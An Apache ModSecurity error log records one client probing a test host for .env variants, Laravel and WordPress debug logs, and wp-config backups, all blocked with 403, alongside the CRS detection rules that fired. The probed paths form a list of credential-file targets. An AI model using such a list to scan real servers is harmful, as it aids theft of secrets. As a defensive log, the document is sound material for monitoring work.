[Sun Mar 15 10:46:55.428977 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "abaAD2AJ710PJa37ZB3ylAAAAAM"]
[Sun Mar 15 10:46:55.429154 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "abaAD2AJ710PJa37ZB3ylAAAAAM"]
[Sun Mar 15 10:46:55.429281 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "abaAD2AJ710PJa37ZB3ylAAAAAM"]
[Sun Mar 15 10:46:55.451244 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "abaAD2AJ710PJa37ZB3ylQAAAAM"]
[Sun Mar 15 10:46:55.451412 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "abaAD2AJ710PJa37ZB3ylQAAAAM"]
[Sun Mar 15 10:46:55.451525 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "abaAD2AJ710PJa37ZB3ylQAAAAM"]
[Sun Mar 15 10:46:55.473516 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.stage"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "abaAD2AJ710PJa37ZB3ylgAAAAM"]
[Sun Mar 15 10:46:55.473752 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "abaAD2AJ710PJa37ZB3ylgAAAAM"]
[Sun Mar 15 10:46:55.473906 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "abaAD2AJ710PJa37ZB3ylgAAAAM"]
[Sun Mar 15 10:46:55.495804 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dev"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.dev"] [unique_id "abaAD2AJ710PJa37ZB3ylwAAAAM"]
[Sun Mar 15 10:46:55.495973 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.dev"] [unique_id "abaAD2AJ710PJa37ZB3ylwAAAAM"]
[Sun Mar 15 10:46:55.496086 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.dev"] [unique_id "abaAD2AJ710PJa37ZB3ylwAAAAM"]
[Sun Mar 15 10:46:55.518169 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.staging"] [unique_id "abaAD2AJ710PJa37ZB3ymAAAAAM"]
[Sun Mar 15 10:46:55.518360 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.staging"] [unique_id "abaAD2AJ710PJa37ZB3ymAAAAAM"]
[Sun Mar 15 10:46:55.518482 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.staging"] [unique_id "abaAD2AJ710PJa37ZB3ymAAAAAM"]
[Sun Mar 15 10:46:55.540380 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.qa"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.qa"] [unique_id "abaAD2AJ710PJa37ZB3ymQAAAAM"]
[Sun Mar 15 10:46:55.540557 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.qa"] [unique_id "abaAD2AJ710PJa37ZB3ymQAAAAM"]
[Sun Mar 15 10:46:55.540675 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.qa"] [unique_id "abaAD2AJ710PJa37ZB3ymQAAAAM"]
[Sun Mar 15 10:46:55.562533 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "autumnus.test.indacotrentino.com"] [uri "/storage/logs/laravel.log"] [unique_id "abaAD2AJ710PJa37ZB3ymgAAAAM"]
[Sun Mar 15 10:46:55.562889 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/storage/logs/laravel.log"] [unique_id "abaAD2AJ710PJa37ZB3ymgAAAAM"]
[Sun Mar 15 10:46:55.563002 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/storage/logs/laravel.log"] [unique_id "abaAD2AJ710PJa37ZB3ymgAAAAM"]
[Sun Mar 15 10:46:55.584804 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "autumnus.test.indacotrentino.com"] [uri "/logs/laravel.log"] [unique_id "abaAD2AJ710PJa37ZB3ymwAAAAM"]
[Sun Mar 15 10:46:55.585157 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/logs/laravel.log"] [unique_id "abaAD2AJ710PJa37ZB3ymwAAAAM"]
[Sun Mar 15 10:46:55.585266 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/logs/laravel.log"] [unique_id "abaAD2AJ710PJa37ZB3ymwAAAAM"]
[Sun Mar 15 10:46:55.606969 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "autumnus.test.indacotrentino.com"] [uri "/logs/error.log"] [unique_id "abaAD2AJ710PJa37ZB3ynAAAAAM"]
[Sun Mar 15 10:46:55.607297 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/logs/error.log"] [unique_id "abaAD2AJ710PJa37ZB3ynAAAAAM"]
[Sun Mar 15 10:46:55.607417 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/logs/error.log"] [unique_id "abaAD2AJ710PJa37ZB3ynAAAAAM"]
[Sun Mar 15 10:46:55.697052 2026] [authz_core:error] [pid 2708247] [client 185.177.72.49:29874] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Sun Mar 15 10:46:55.971676 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-content/debug.log"] [unique_id "abaAD2AJ710PJa37ZB3yrAAAAAM"]
[Sun Mar 15 10:46:55.972058 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-content/debug.log"] [unique_id "abaAD2AJ710PJa37ZB3yrAAAAAM"]
[Sun Mar 15 10:46:55.972171 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-content/debug.log"] [unique_id "abaAD2AJ710PJa37ZB3yrAAAAAM"]
[Sun Mar 15 10:46:56.491129 2026] [:error] [pid 2708246] [client 185.177.72.49:29896] [client 185.177.72.49] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-config.old"] [unique_id "abaAEFRPDbn7htWAttP1pgAAAAI"]
[Sun Mar 15 10:46:56.491352 2026] [:error] [pid 2708246] [client 185.177.72.49:29896] [client 185.177.72.49] ModSecurity: Warning. Matched phrase "wp-config.old" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.old found within REQUEST_FILENAME: /wp-config.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-config.old"] [unique_id "abaAEFRPDbn7htWAttP1pgAAAAI"]
[Sun Mar 15 10:46:56.491519 2026] [:error] [pid 2708246] [client 185.177.72.49:29896] [client 185.177.72.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-config.old"] [unique_id "abaAEFRPDbn7htWAttP1pgAAAAI"]
[Sun Mar 15 10:46:56.491643 2026] [:error] [pid 2708246] [client 185.177.72.49:29896] [client 185.177.72.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-config.old"] [unique_id "abaAEFRPDbn7htWAttP1pgAAAAI"]
[Sun Mar 15 10:46:56.604449 2026] [:error] [pid 2708246] [client 185.177.72.49:29896] [client 185.177.72.49] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-config.php.backup"] [unique_id "abaAEFRPDbn7htWAttP1qwAAAAI"]
